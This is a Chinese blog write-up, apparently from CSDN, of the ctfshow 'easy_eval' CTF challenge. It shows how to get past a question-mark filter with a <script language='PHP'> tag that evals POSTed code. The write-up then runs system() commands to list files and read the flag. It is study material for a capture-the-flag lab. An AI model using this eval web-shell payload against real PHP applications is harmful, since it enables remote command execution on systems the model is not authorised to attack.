ctfshow:easy_eval

最新推荐文章于 2024-05-02 23:25:30 发布
最新推荐文章于 2024-05-02 23:25:30 发布
阅读量567 收藏
点赞数 1
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/windcandy/article/details/127839502
版权

打开题目看代码

 str_replace()把字符串中某一的字符,换成另一个字符并且区分大小写。

所以存在一个过滤,把问号过滤掉了。

所以常见的<?php  ?>和<? ?>就不可以用了。但是我们还可以用<script></script>

这种php标签可以不用问号。

所以构造语句code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('ls');

 有回显,可以接着就是查询flag

code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('find /f*');

最后打开即可 code=<script language='PHP'>eval($_POST["cmd"]);</script>&cmd=system('nl /f*');

 

 

唐飛玉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf (easy_eval)
Glacier_Mount的博客
07-02 1698
反序列化、redis
ctfshow新手杯-[easy-eval]
weixin_52116519的博客
10-11 890
【代码】ctfshow新手杯-[easy-eval]
【Web】CTFSHOW 新手杯 题解
最新发布
uuzeray的博客
05-02 603
先本地起个服务,先直接请求,再请求?name=Z3r4y,拿到new_rookie_info和Z3r4y_info。对比一下,其实就是要让I3为I1就可,sb后的.起到截断作用,id在name之后,name是我们可控的。$secret为$_COOKIE[secret],直接引用绕过了。可以在/change路由进行打入,用newname替换name。打PHP_SESSION_UPLOAD_PROGRESS。运行结果插到cookie里,而后便可为所欲为。当id为0时可以拿到flag。令mode为0看到源码。
『CTF Web复现』[2021 天翼杯]easy_eval
Ho1aAs‘s Blog
09-23 1119
文章目录利用点源码过程分析反序列化绕过wakeupRedis加载恶意so获取shell完 利用点 反序列化绕过wakeup Redis加载恶意so获取shell 源码 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code
2021 天翼杯easy_eval
m0_56059226的博客
10-04 2342
打开环境 <?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ echo $this->a-&gt
天翼杯easy_eval复现
weixin_44687621的博客
09-25 1496
最近打了很多比赛,很多题没有做出来。所以决定复现一下某些题目。 本地环境的搭建 本地环境涉及到php的web服务、redis数据库。 Dockerfile的编写 FROM ubuntu:16.04 COPY src/sources.list /etc/apt/sources.list COPY src/redis-4.0.9 /home/redis-4.0.9 RUN apt-get update && \ apt-get install -y curl \
ap算法matlab代码-DARKFACE_eval_tools:DARKFACE_eval_tools
06-02
请注意,eval_tools 预计可与八度一起使用,从 MATLAB 运行时可能会出现错误 docker pull scaffrey/eval_tools_ap:dry_run docker run --rm -it \ -v /path/to/your/submission:/tools/data \ -v /path/to/save/...
mir_evaluators:mir_eval的评估程序脚本
05-11
mir_eval评估器 该存储库包含脚本,这些脚本可以从命令行运行,并可以使用mir_eval根据您提供的参考注释和估计的注释来计算指标。 要使用评估程序,必须首先安装mir_eval及其依赖项(请参阅)。 用法 通过示例,我们...
Faster R-CNN中voc_eval.py文件
04-09
借助Faster R-CNN中voc_eval.py文件,测试YOLO测试数据集mAP等结果,博客见
Ruby Meta Programming: define_method or class_eval
03-01
`define_method`和`class_eval`是Ruby元编程中的两个关键方法,它们被广泛用于动态地添加方法到类或者模块中。这篇文章将深入探讨这两个方法的用法和区别。 `define_method`方法允许我们传递一个符号和一个代码块来...
Enterprise-Web3.0:适用于Web3.0:trade_mark:的Enterprise:trade_mark:
02-01
npx ETM eval fdcFizzBuzzDelegator.E:trade_mark: 涡轮模式! npx ETM eval fdcFizzBuzzDelegator.E:trade_mark: --turbo 什么 Enterprise:trade_mark:Web3.0:trade_mark:是用于语言的解析器和编译器。 ...
[ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯
热门推荐
ZXW_NUDT的博客
10-07 2万+
CTFShow新(脑洞)手(套路)杯
ctfshow 新手杯 web
shinygod的博客
10-09 720
基础练习
命令执行(ctfshow)
unexpectedthing的博客
11-12 3123
文章目录介绍PHP命令执行的参数${php代码}assertpreg_replace命令执行的几种常用的符号命令执行的基本绕过 介绍 命令执行:一句话就是没有对用户的提交的数据进行过滤,导致通过一些系统命令获取了一些信息。 PHP命令执行的参数 1.system:执行系统命令,会输出 例子:http://www.dvwa.com/cmd/test.php?cmd=||%20ipconfig 2.exec:exec函数不会将执行后的结果输出,与system功能一样 3.passthru:用
ctfshow学习记录-web入门(命令执行69-77&118)
龟速更新的九某人
06-27 970
ctfshow学习记录-web入门(命令执行web69-77&118)
CTFShow 2022——新手杯wp WEB题目
qq_60878323的博客
10-09 1120
小艾大佬的投稿支持 web AK了
ctfshow__黑盒测试
qq_45655564的博客
07-04 401
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
Method EasyWeChat\Kernel\Support\Collection::__set_state() must take exactly 1 argument
05-30
解决这个问题的方法是,将`var_export()`输出的字符串中的`stdClass::__set_state`部分替换为`EasyWeChat\Kernel\Support\Collection::__set_state`,即将默认的`stdClass`类替换为EasyWeChat的`Collection`类。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值